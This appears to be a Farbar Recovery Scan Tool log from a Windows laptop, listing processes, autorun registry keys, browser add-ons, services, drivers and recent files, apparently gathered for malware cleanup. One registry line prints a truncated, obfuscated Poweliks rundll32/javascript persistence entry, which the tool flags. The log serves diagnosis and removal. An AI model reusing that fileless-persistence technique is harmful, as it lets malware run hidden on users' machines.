(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(Dell Inc.) C:\Windows\System32\WLTRAY.EXE
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Akamai Technologies, Inc.) C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(CyberLink Corp.) C:\Program Files (x86)\Dell\MediaDirect\PCMService.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Dell) C:\Users\Ashley\AppData\Local\Apps\2.0\KH6XP463.OY2\CW4LTZ3J.OK8\dell..tion_0f612f649c4a10af_0005.0004_3ddfe37344028d2c\DellSystemDetect.exe
(Akamai Technologies, Inc.) C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_15f4e438\AESTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\ProgramData\SingleClick Systems\MySQL\bin\mysqld.exe
(SingleClick Systems) C:\ProgramData\SingleClick Systems\Remote Access File Sync Service\dsl_fs_sync.exe
(Dell Inc.) C:\ProgramData\SingleClick Systems\Advanced Networking Service\hnm_svc.exe
( ) C:\Windows\System32\lxducoms.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corporation) C:\Windows\System32\TCPSVCS.EXE
(Microsoft Corporation) C:\Windows\System32\snmp.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AcroRd32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AcroRd32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AdobeCollabSync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [271872 2008-07-16] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Broadcom Wireless Manager UI] => C:\Windows\system32\WLTRAY.exe [4119552 2008-11-17] (Dell Inc.)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [462848 2009-03-16] (IDT, Inc.)
HKLM-x32\...\Run: [PCMService] => C:\Program Files (x86)\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [DellSystemDetect] => C:\Users\Ashley\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell\Dell System Detect.appref-ms
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [FreeRAM XP] => C:\Program Files (x86)\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe [1591808 2006-03-23] (YourWare Solutions ™)
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [uTorrent] => "C:\Users\Ashley\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\MountPoints2: {7c5292e9-9623-11df-861e-005056c00008} - J:\Autorun.exe
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [EA Core] => C:\Program Files (x86)\Electronic Arts\EADM\Core.exe -silent
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [Google Update] => "C:\Users\Ashley\AppData\Local\Google\Update\GoogleUpdate.exe" /c
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [Akamai NetSession Interface] => C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\MountPoints2: {4e39f91a-cbb5-11dd-8863-806e6f6e6963} - E:\autorun.exe
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Mcx1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\RA Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
BootExecute: autocheck autochk * sdnclean64.exe
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
ProxyServer: 127.0.0.1:5222
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell.com
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell.com
URLSearchHook: ATTENTION ==> Default URLSearchHook is missing.
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&rlz=
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Lexmark Printable Web -> {D2C5E510-BE6D-42CC-9F61-E4F939078474} -> C:\Program Files\Lexmark Printable Web\bho.dll ()
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKCU - No Name - {724D43A0-0D85-11D4-9908-00400523E39A} -  No File
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8064.0206.dll (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8064.0206.dll (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
 
FireFox:
========
FF ProfilePath: C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default
FF Homepage: about:home
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @virtools.com/3DviaPlayer -> C:\Program Files (x86)\Virtools\3D Life Player\npvirtools.dll (Dassault Systèmes)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\CrazyTalk4Native.dll (C3D)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctdomemhelper.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctframeplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\imagickrt.dll (BEXTech)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\np-mswmp.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npRLCT4Player.dll ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npViewpoint.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\np_gp.dll (NOS Microsystems Ltd.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\rlcontentclass.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLMusicPacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLMusicUnpacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLVoicePacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLVoiceUnpacker.dll ()
FF Extension: Geolocater - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\geolocater@3liz.com [2013-05-08]
FF Extension: Google Toolbar for Firefox - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{3112ca9c-de6d-4884-a869-9855de68056c} [2010-12-09]
FF Extension: foursquarefox | foursquare for Firefox - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{8D8755DA-0541-4E4C-818A-99188622BA02} [2010-12-21]
FF Extension: DownloadHelper - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d} [2014-10-10]
FF Extension: Adobe DLM (powered by getPlus®) - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{E2883E8F-472F-4fb0-9522-AC9BF37916A7} [2009-10-28]
FF Extension: Firebug - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\firebug@software.joehewitt.com.xpi [2011-03-24]
FF Extension: Disable clipboard manipulations - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\nocopypaste@adblockplus.org.xpi [2014-02-11]
FF Extension: StumbleUpon - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}.xpi [2011-06-14]
FF Extension: Adblock Plus - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2011-03-26]
FF Extension: Greasemonkey - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2012-08-25]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-04-11]
 
Chrome: 
=======
CHR Profile: C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-08-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-28]
CHR Extension: (AdBlock) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-03-25]
CHR Extension: (Google Wallet) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR HKCU\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\Ashley\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [2013-08-27]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [143120 2013-05-23] (SUPERAntiSpyware.com)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [155648 2008-09-23] (Stardock Corporation) [File not signed]
R2 dsl-db; C:\ProgramData\SingleClick Systems\MySQL\bin\mysqld.exe [5730304 2007-09-14] () [File not signed]
R2 dsl-fs-sync; C:\ProgramData\SingleClick Systems\Remote Access File Sync Service\dsl_fs_sync.exe [173296 2008-09-30] (SingleClick Systems)
S3 getPlusHelper; C:\Program Files (x86)\NOS\bin\getPlus_Helper.dll [51168 2009-09-23] (NOS Microsystems Ltd.)
R2 hnmsvc; c:\ProgramData\SingleClick Systems\Advanced Networking Service\hnm_svc.exe [820464 2008-09-30] (Dell Inc.)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
S2 lxduCATSCustConnectService; C:\Windows\system32\spool\DRIVERS\x64\3\\lxduserv.exe [29184 2009-10-16] (Lexmark International, Inc.)
R2 lxdu_device; C:\Windows\system32\lxducoms.exe [1039360 2009-10-16] ( )
R2 lxdu_device; C:\Windows\SysWOW64\lxducoms.exe [589824 2009-10-16] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 simptcp; C:\Windows\SysWOW64\tcpsvcs.exe [9728 2009-08-14] (Microsoft Corporation)
R2 SNMP; C:\Windows\System32\snmp.exe [49664 2008-01-20] (Microsoft Corporation)
R2 SNMP; C:\Windows\SysWOW64\snmp.exe [47616 2008-01-20] (Microsoft Corporation)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 Tenable Nessus; C:\tools\Nessus\nessus-service.exe [11264 2011-02-25] (Tenable Network Security, Inc) [File not signed]
R2 wltrysvc; C:\Windows\System32\bcmwltry.exe [3051520 2008-11-17] (Dell Inc.) [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 cpudrv64; C:\Program Files (x86)\SystemRequirementsLab\cpudrv64.sys [17864 2009-12-18] ()
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [14456 2013-07-18] (GFI Software)
R2 npf; C:\Windows\System32\drivers\npf.sys [35344 2011-02-11] (CACE Technologies, Inc.)
R3 RLDesignVirtualAudioCableWdm; C:\Windows\System32\DRIVERS\livecamv.sys [49664 2007-02-05] ()
S3 rspLLL; C:\Windows\System32\DRIVERS\rspLLL64.sys [23968 2013-02-07] (Resplendence Software Projects Sp.)
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R0 SmartDefragDriver; C:\Windows\System32\Drivers\SmartDefragDriver.sys [21184 2013-12-24] (IObit)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2010-05-06] () [File not signed]
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-17] ()
U3 aa31u6kl; C:\Windows\System32\Drivers\aa31u6kl.sys [0 ] (Microsoft Corporation)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S0 Lbd; system32\DRIVERS\Lbd.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S0 vmci; system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-19 17:02 - 2014-10-19 17:02 - 00002757 _____ () C:\Users\Ashley\Desktop\JRT.txt
2014-10-19 16:38 - 2014-10-19 16:38 - 00000000 ____D () C:\Windows\ERUNT
2014-10-19 16:36 - 2014-10-19 16:36 - 00001087 _____ () C:\Users\Ashley\Desktop\MBAM.txt
2014-10-19 15:25 - 2014-10-19 17:03 - 00007722 _____ () C:\Users\Ashley\Desktop\AdwCleaner[S1].txt
2014-10-19 15:13 - 2014-10-19 15:13 - 01705698 _____ (Thisisu) C:\Users\Ashley\Downloads\JRT.exe
2014-10-19 15:10 - 2014-10-19 15:10 - 01976320 _____ () C:\Users\Ashley\Downloads\AdwCleaner.exe
2014-10-18 13:34 - 2014-10-18 13:30 - 00014582 _____ () C:\Users\Ashley\Desktop\dds.txt
2014-10-18 12:56 - 2014-10-18 12:58 - 00688992 ____R (Swearware) C:\Users\Ashley\Desktop\dds (1).com
2014-10-18 12:35 - 2014-10-18 12:35 - 00000000 _____ () C:\Users\Ashley\Desktop\bleep.txt
2014-10-17 18:03 - 2014-10-17 18:03 - 00000218 _____ () C:\Users\Study\AppData\Local\recently-used.xbel
2014-10-17 16:21 - 2014-10-17 18:04 - 00000000 ____D () C:\Users\Study\Ebooks
2014-10-17 16:04 - 2014-10-18 12:24 - 00244368 _____ () C:\Users\Ashley\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-17 14:41 - 2014-10-17 16:01 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-10-17 14:41 - 2014-10-17 14:41 - 00001192 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-10-17 14:41 - 2014-10-17 14:41 - 00001180 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-10-17 14:41 - 2014-10-17 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-10-17 14:41 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-10-17 14:40 - 2014-10-17 14:47 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-17 14:26 - 2014-10-17 14:26 - 00000000 ____D () C:\Windows\Tasks\ImCleanDisabled
2014-10-17 13:49 - 2014-10-17 13:49 - 00003593 _____ () C:\Users\Ashley\Desktop\attach.zip
2014-10-17 13:48 - 2014-10-18 13:34 - 00012368 _____ () C:\Users\Ashley\Desktop\attach.txt
2014-10-17 13:29 - 2014-10-17 13:30 - 00688992 ____R (Swearware) C:\Users\Ashley\Downloads\dds.com
2014-10-17 13:20 - 2014-10-17 13:20 - 00035704 _____ () C:\Users\Ashley\Desktop\Addition.txt
2014-10-17 13:19 - 2014-10-17 13:20 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Ashley\Downloads\tdsskiller (1).exe
2014-10-17 13:17 - 2014-10-17 14:08 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-17 13:17 - 2014-10-17 13:17 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-17 13:15 - 2014-10-17 13:15 - 15725144 _____ () C:\Users\Ashley\Downloads\RogueKiller.exe
2014-10-17 13:13 - 2014-10-19 17:03 - 00023657 _____ () C:\Users\Ashley\Desktop\FRST.txt
2014-10-17 13:13 - 2014-10-17 13:13 - 02112000 _____ (Farbar) C:\Users\Ashley\Downloads\FRST64 (1).exe
2014-10-17 11:53 - 2014-10-17 11:53 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Ashley\Downloads\tdsskiller.exe
2014-10-17 11:41 - 2014-10-19 17:03 - 00000000 ____D () C:\FRST
2014-10-17 11:40 - 2014-10-17 11:40 - 02112000 _____ (Farbar) C:\Users\Ashley\Desktop\FRST64.exe
2014-10-17 10:57 - 2014-10-19 15:33 - 00091645 _____ () C:\Windows\WindowsUpdate.log
2014-10-17 10:55 - 2014-10-17 10:55 - 04862664 _____ (AVAST Software) C:\Users\Ashley\Desktop\avast_free_antivirus_setup_online.exe
2014-10-17 10:54 - 2014-10-17 10:54 - 01055936 _____ (Adobe) C:\Users\Ashley\Desktop\install_flashplayer15x32axau_mssd_aaa_aih.exe
2014-10-17 10:49 - 2014-10-19 15:25 - 00005396 _____ () C:\Windows\PFRO.log
2014-10-17 10:49 - 2014-10-17 10:50 - 05599416 _____ () C:\Windows\system32\FNTCACHE.DAT
